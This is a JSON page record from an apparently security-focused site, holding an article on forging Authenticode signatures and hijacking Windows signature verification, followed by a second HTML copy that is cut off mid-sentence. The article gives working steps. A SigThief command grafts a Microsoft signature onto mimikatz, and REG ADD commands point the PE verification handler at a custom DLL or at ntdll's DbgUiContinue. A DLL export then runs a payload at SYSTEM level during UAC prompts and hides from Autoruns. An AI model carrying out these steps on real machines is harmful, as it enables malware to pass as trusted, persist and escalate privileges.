[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDJD47TqXuJxc5M2srjTJH5BQT4Mcy-cJCDBq6KQ6GU0":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},445,"What is Authenticode signature forgery and how is it performed?","Authenticode signature forgery involves copying a valid digital signature from a trusted Microsoft-signed PE file (e.g., `consent.exe`) and appending it to a different executable. Tools like SigThief automate this by extracting the signature's Security Directory RVA and Size and patching them into the target file, as detailed in [Authenticode Signature Forgery - PE File Signature Forgery and Signature Verification Hijacking](\u002Fnews\u002Fauthenticode-signature-forgery-pe-file-signature-forgery-and-signature-verification-hijacking). However, this technique alone results in a 'HashMismatch' error because the file's hash no longer matches the embedded signature.","\u003Cp>Authenticode signature forgery involves copying a valid digital signature from a trusted Microsoft-signed PE file (e.g., `consent.exe`) and appending it to a different executable. Tools like SigThief automate this by extracting the signature&#39;s Security Directory RVA and Size and patching them into the target file, as detailed in [Authenticode Signature Forgery - PE File Signature Forgery and Signature Verification Hijacking](\u002Fnews\u002Fauthenticode-signature-forgery-pe-file-signature-forgery-and-signature-verification-hijacking). However, this technique alone results in a &#39;HashMismatch&#39; error because the file&#39;s hash no longer matches the embedded signature.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fauthenticode-signature-forgery-pe-file-signature-forgery-and-signature-verification-hijacking\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-authenticode-signature-forgery-and-how-is-it-performed-1777483628263","Authenticode, signature forgery, PE file, SigThief, Security Directory, HashMismatch",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":20,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},112,"Authenticode Signature Forgery - PE File Signature Forgery and Signature Verification Hijacking","authenticode-signature-forgery-pe-file-signature-forgery-and-signature-verification-hijacking","Learn how to forge Authenticode signatures in PE files and hijack signature verification for backdoor execution. Exploit techniques with tools like SigThief and PowerShell.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous article 'CAT File Digital Signature Usage Techniques' introduced the basics of certificate signatures. In Windows systems, there are two methods for signing files: appending at the end of the file (Authenticode) and CAT files (catalog). This article will introduce related exploitation techniques for Authenticode signatures—PE file signature forgery and signature verification hijacking.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The techniques introduced in this article are referenced from materials publicly shared by Matt Graeber (@mattifestation). This article will combine personal experience to organize the relevant content and add personal insights.\u003C\u002Fp>\u003Cp>\u003Cstrong>References:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fspecterops.io\u002Fassets\u002Fresources\u002FSpecterOps_Subverting_Trust_in_Windows.pdf\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.exploit-monday.com\u002F2017\u002F08\u002Fapplication-of-authenticode-signatures.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdrive.google.com\u002Ffile\u002Fd\u002F0B-K55rLoulAfNms1aW1rbXF1Tmc\u002Fview\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Authenticode Signature Forgery for PE Files\u003C\u002Fli>\u003Cli>Hijacking the signature verification process to achieve code execution as a backdoor\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 PE File Signature Forgery\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Detailed documentation for Authenticode can be found at:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fdownload.microsoft.com\u002Fdownload\u002F9\u002Fc\u002F5\u002F9c5b2167-8017-4bae-9fde-d599bac8184a\u002FAuthenticode_PE.docx\u003C\u002Fp>\u003Cp>Some system files contain Microsoft signatures, such as C:\\Windows\\System32\\consent.exe\u003C\u002Fp>\u003Cp>Signature information can be viewed in file properties, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017400415_0_29ef964773.jpeg\">\u003C\u002Fp>\u003Cp>Verification via PowerShell, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-AuthenticodeSignature C:\\Windows\\System32\\consent.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017446058_1_6d619cfffd.jpeg\">\u003C\u002Fp>\u003Cp>Using the tool CFF Explorer to obtain file structure, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017468454_2_0375393c54.jpeg\">\u003C\u002Fp>\u003Cp>Security Directory RVA indicates the offset position of the digital signature in the PE file\u003C\u002Fp>\u003Cp>Security Directory Size represents the length of the digital signature\u003C\u002Fp>\u003Cp>Extract this portion of content and append it to the end of another file test.exe, while using CFF Explorer to modify the corresponding Security Directory RVA and Security Directory Size of test.exe.\u003C\u002Fp>\u003Cp>Thus, the forgery of the digital signature is achieved.\u003C\u002Fp>\u003Cp>The open-source tool SigThief can automate the above process, available at:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsecretsquirrel\u002FSigThief\u003C\u002Fp>\u003Ch3>Practical test:\u003C\u002Fh3>\u003Cp>Test system: Win7\u003C\u002Fp>\u003Cp>Copy the digital signature from C:\\Windows\\System32\\consent.exe to mimikatz.exe\u003C\u002Fp>\u003Cp>Parameters as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sigthief.py -i C:\\Windows\\System32\\consent.exe -t mimikatz.exe -o si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generate si.exe, which has a Microsoft digital signature but prompts that the certificate is invalid, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017482785_3_20dca18bdd.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Some test systems cannot use sigthief.py, prompting that 0x9 cannot be found; activating the system will resolve this.\u003C\u002Fp>\u003Cp>Verify via PowerShell with the following code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-AuthenticodeSignature .\\si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display HashMismatch, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017493626_4_a105569ecc.jpeg\">\u003C\u002Fp>\u003Cp>Verify via signtool.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>signtool.exe verify \u002Fv si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display SignTool Error: WinVerifyTrust returned error: 0x80096010, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017502438_5_c9ed5c36bc.jpeg\">\u003C\u002Fp>\u003Cp>Verify via sigcheck.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sigcheck.exe -q si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display The digital signature of the object did not verify, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017508230_6_ee453a5ea6.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Modify configuration to pass signature verification\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>View help documentation for Get-AuthenticodeSignature:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Help Get-AuthenticodeSignature -Full \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View help documentation for the related operation Set-AuthenticodeSignature:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Help Set-AuthenticodeSignature -Full\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Discover the function of this command:\u003C\u002Fp>\u003Cp>The Set-AuthenticodeSignature cmdlet adds an Authenticode signature to\u003C\u002Fp>\u003Cp>any file that supports Subject Interface Package (SIP).\u003C\u002Fp>\u003Cp>For information on SIP, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Feduardonavarro\u002F2008\u002F07\u002F11\u002Fsips-subject-interface-package-and-authenticode\u002F\u003C\u002Fp>\u003Cp>Obtain useful information:\u003C\u002Fp>\u003Cp>There are some included as part of the OS (at least on Vista). Locate\u003C\u002Fp>\u003Cp>in the %WINDIR%\\System32 directory. They usually have a naming ending\u003C\u002Fp>\u003Cp>with sip.dll, i.e. msisip.dll is the Microsoft Installer (.msi) SIP.\u003C\u002Fp>\u003Cp>Search for SIP in Windows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ls C:\\Windows\\System32\\*sip.dll -Recurse -ErrorAction SilentlyContinue\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Only one in Win7: C:\\Windows\\System32\\msisip.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Matt Graeber's test system is Win10, where multiple dlls can be found\u003C\u002Fp>\u003Cp>Open the DLL using IDA and examine the function DllRegisterServer()\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017514729_7_87f29790e5.jpeg\">\u003C\u002Fp>\u003Cp>Found a distinctive name MsiSIPVerifyIndirectData, which literally appears to be a signature verification function\u003C\u002Fp>\u003Cp>Look up information and locate the function at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwindows\u002Fdesktop\u002Fcc542591%28v=vs.85%29.aspx\u003C\u002Fp>\u003Cp>Discovered that this function returns TRUE for successful verification and FALSE for verification failure\u003C\u002Fp>\u003Cp>This function corresponds to a registry key value located at:\u003C\u002Fp>\u003Cp>HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017519705_8_084a27e5a2.jpeg\">\u003C\u002Fp>\u003Cp>Different GUIDs correspond to verification for different file formats, for example:\u003C\u002Fp>\u003Cul>\u003Cli>C689AAB8-8E78-11D0-8C47-00C04FC295EE - PE\u003C\u002Fli>\u003Cli>DE351A43-8E59-11D0-8C47-00C04FC295EE - catalog\t.cat files\u003C\u002Fli>\u003Cli>9BA61D3F-E73A-11D0-8CD2-00C04FC295EE - CTL \t\t.ctl files\u003C\u002Fli>\u003Cli>C689AABA-8E78-11D0-8C47-00C04FC295EE - cabinet \t.cab file\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>GUID description referenced from \"Subverting Trust in Windows\" Page 4\u003C\u002Fp>\u003Cp>Next, attempt to replace the dll and FuncName under HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\u003C\u002Fp>\u003Cp>Implemented via C++, create a dll, add an export function, format referencing CryptSIPVerifyIndirectData, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>BOOL WINAPI CryptSIPVerifyIndirectData(SIP_SUBJECTINFO *pSubjectInfo, SIP_INDIRECT_DATA *pIndirectData)\u003Cbr>{\u003Cbr>\treturn TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile to generate signtest.dll\u003C\u002Fp>\u003Cp>Modify the registry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\test\\signtest.dll\" \u002Ff\u003Cbr>\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"CryptSIPVerifyIndirectData\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart cmd, verify using PowerShell:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-AuthenticodeSignature .\\si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display Valid, verification successful\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017523563_9_47ed23ba7a.jpeg\">\u003C\u002Fp>\u003Cp>Verification via signtool.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>signtool.exe verify \u002Fv si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Verification passed\u003C\u002Fp>\u003Cp>Verification via sigcheck.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sigcheck.exe -q si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Verification passed, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017526550_10_1056ada91f.jpeg\">\u003C\u002Fp>\u003Cp>Restart explorer.exe, check file properties, signature status shows signature is effective, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017527745_11_04d69c89d5.jpeg\">\u003C\u002Fp>\u003Cp>Furthermore,\u003Cstrong>Does the DLL have to be in a fixed format?\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Therefore, proceed with the following test:\u003C\u002Fp>\u003Cp>The exported function is named test1, complete code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>BOOL APIENTRY DllMain( HANDLE hModule, \u003Cbr>                       DWORD  ul_reason_for_call, \u003Cbr>                       LPVOID lpReserved\u003Cbr>\t\t\t\t\t )\u003Cbr>{\u003Cbr>    return TRUE;\u003Cbr>}\u003Cbr>BOOL WINAPI test1() \u003Cbr>{\u003Cbr>\treturn TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Modify the corresponding registry key value:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\test\\signtest.dll\" \u002Ff\u003Cbr>\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"test1\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test can still bypass verification\u003C\u002Fp>\u003Cp>This indicates that as long as the exported function of the DLL returns TRUE, verification can be bypassed\u003C\u002Fp>\u003Cp>Therefore, one can search for system default DLLs and find an exported function that returns true (of course, there are many export functions available for exploitation here)\u003C\u002Fp>\u003Cp>For example, \"C:\\Windows\\System32\\ntdll.dll\"\u003C\u002Fp>\u003Cp>Exported function: DbgUiContinue\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\Windows\\System32\\ntdll.dll\" \u002Ff\u003Cbr>\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"DbgUiContinue\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This way, there is no need to leave a self-written DLL on the system\u003C\u002Fp>\u003Cp>For 64-bit systems, there are 32-bit registry key values\u003C\u002Fp>\u003Cp>If using 32-bit programs, such as 32-bit signtool and sigcheck, to bypass verification, it is also necessary to modify the 32-bit registry key values. The corresponding code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\Windows\\System32\\ntdll.dll\" \u002Ff\u003Cbr>\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"DbgUiContinue\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Signature Verification Hijacking\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Modify the registry and write a DLL to bypass the signature verification process. If we add our own code in the DLL's export functions, this achieves signature verification hijacking.\u003C\u002Fp>\u003Cp>Add execution code in the signature verification:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>BOOL APIENTRY DllMain( HANDLE hModule, \u003Cbr>                       DWORD  ul_reason_for_call, \u003Cbr>                       LPVOID lpReserved\u003Cbr>\t\t\t\t\t )\u003Cbr>{\u003Cbr>    return TRUE;\u003Cbr>}\u003Cbr>BOOL WINAPI test1() \u003Cbr>{\u003Cbr>\tWinExec(\"calc.exe\",SW_SHOWNORMAL);\u003Cbr>\treturn TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Whenever an operation involves signature verification, loading our own DLL will launch the calculator.\u003C\u002Fp>\u003Cp>The following programs will perform signature verification operations:\u003C\u002Fp>\u003Cul>\u003Cli>DllHost.exe - When the “Digital Signatures” tab is displayed in file properties\u003C\u002Fli>\u003Cli>Process Explorer - When the “Verified Signer” tab is displayed\u003C\u002Fli>\u003Cli>Autoruns\u003C\u002Fli>\u003Cli>Sigcheck\u003C\u002Fli>\u003Cli>consent.exe - Any time a UAC prompt is displayed\u003C\u002Fli>\u003Cli>signtool.exe\u003C\u002Fli>\u003Cli>smartscreen.exe\u003C\u002Fli>\u003Cli>Get-AuthenticodeSignature\u003C\u002Fli>\u003Cli>Set-AuthenticodeSignature\u003C\u002Fli>\u003Cli>Security vendor software that performs certificate validation based on calls to WinVerifyTrust.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This citation is from 'Subverting Trust in Windows' Page 33\u003C\u002Fp>\u003Cp>For example, viewing file properties - digital signature details, loading a DLL, and popping up a calculator, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017529048_12_dacd64b564.jpeg\">\u003C\u002Fp>\u003Cp>Specifically, executing a program with administrator privileges triggers UAC. If hijacked at this point, the permissions are system-level.\u003C\u002Fp>\u003Cp>The complete operation is shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017530466_13_3d4b591d2a.png\">\u003C\u002Fp>\u003Ch3>Supplement:\u003C\u002Fh3>\u003Cp>\u003Cstrong>1. DLL Hijacking\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Some GUIDs have default registry DLL paths as relative paths, which creates a DLL hijacking issue. This allows bypassing signature verification without modifying the registry.\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Hiding from Autoruns\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The startup item detection tool Autoruns does not display files with Microsoft signatures by default, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017532271_14_512caac932.jpeg\">\u003C\u002Fp>\u003Cp>If a file contains a Microsoft signature, it will not be displayed in the Autoruns panel by default.\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Some whitelisted programs trust files with Microsoft certificates by default, which poses a risk.\u003C\u002Fp>\u003Cp>It is recommended not to blindly trust certificates.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation techniques related to Authenticode signatures—PE file signature forgery and signature verification hijacking. The next article will continue to discuss Authenticode signature forgery techniques—signature forgery targeting specific file types.\u003C\u002Fp>\u003Cp>Finally, thanks to Matt Graeber for sharing.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous article 'CAT File Digital Signature Usage Techniques' introduced the basics of certificate signatures. In Windows systems, there are two methods for signing files: appending at the end of the file (Authenticode) and CAT files (catalog). This article will introduce related exploitation techniques for Authenticode signatures—PE file signature forgery and signature verification hijacking.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The techniques introduced in this article are referenced from materials publicly shared by Matt Graeber (@mattifestation). This article will combine personal experience to organize the relevant content and add personal insights.\u003C\u002Fp>\u003Cp>\u003Cstrong>References:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fspecterops.io\u002Fassets\u002Fresources\u002FSpecterOps_Subverting_Trust_in_Windows.pdf\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.exploit-monday.com\u002F2017\u002F08\u002Fapplication-of-authenticode-signatures.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdrive.google.com\u002Ffile\u002Fd\u002F0B-K55rLoulAfNms1aW1rbXF1Tmc\u002Fview\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Authenticode Signature Forgery for PE Files\u003C\u002Fli>\u003Cli>Hijacking the signature verification process to achieve code execution as a backdoor\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 PE File Signature Forgery\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Detailed documentation for Authenticode can be found at:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fdownload.microsoft.com\u002Fdownload\u002F9\u002Fc\u002F5\u002F9c5b2167-8017-4bae-9fde-d599bac8184a\u002FAuthenticode_PE.docx\u003C\u002Fp>\u003Cp>Some system files contain Microsoft signatures, such as C:\\Windows\\System32\\consent.exe\u003C\u002Fp>\u003Cp>Signature information can be viewed in file properties, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017400415_0_29ef964773-1.jpeg\">\u003C\u002Fp>\u003Cp>Verification via PowerShell, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-AuthenticodeSignature C:\\Windows\\System32\\consent.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017446058_1_6d619cfffd-1.jpeg\">\u003C\u002Fp>\u003Cp>Using the tool CFF Explorer to obtain file structure, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017468454_2_0375393c54-1.jpeg\">\u003C\u002Fp>\u003Cp>Security Directory RVA indicates the offset position of the digital signature in the PE file\u003C\u002Fp>\u003Cp>Security Directory Size represents the length of the digital signature\u003C\u002Fp>\u003Cp>Extract this portion of content and append it to the end of another file test.exe, while using CFF Explorer to modify the corresponding Security Directory RVA and Security Directory Size of test.exe.\u003C\u002Fp>\u003Cp>Thus, the forgery of the digital signature is achieved.\u003C\u002Fp>\u003Cp>The open-source tool SigThief can automate the above process, available at:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsecretsquirrel\u002FSigThief\u003C\u002Fp>\u003Ch3>Practical test:\u003C\u002Fh3>\u003Cp>Test system: Win7\u003C\u002Fp>\u003Cp>Copy the digital signature from C:\\Windows\\System32\\consent.exe to mimikatz.exe\u003C\u002Fp>\u003Cp>Parameters as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sigthief.py -i C:\\Windows\\System32\\consent.exe -t mimikatz.exe -o si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generate si.exe, which has a Microsoft digital signature but prompts that the certificate is invalid, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017482785_3_20dca18bdd-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Some test systems cannot use sigthief.py, prompting that 0x9 cannot be found; activating the system will resolve this.\u003C\u002Fp>\u003Cp>Verify via PowerShell with the following code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-AuthenticodeSignature .\\si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display HashMismatch, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017493626_4_a105569ecc-1.jpeg\">\u003C\u002Fp>\u003Cp>Verify via 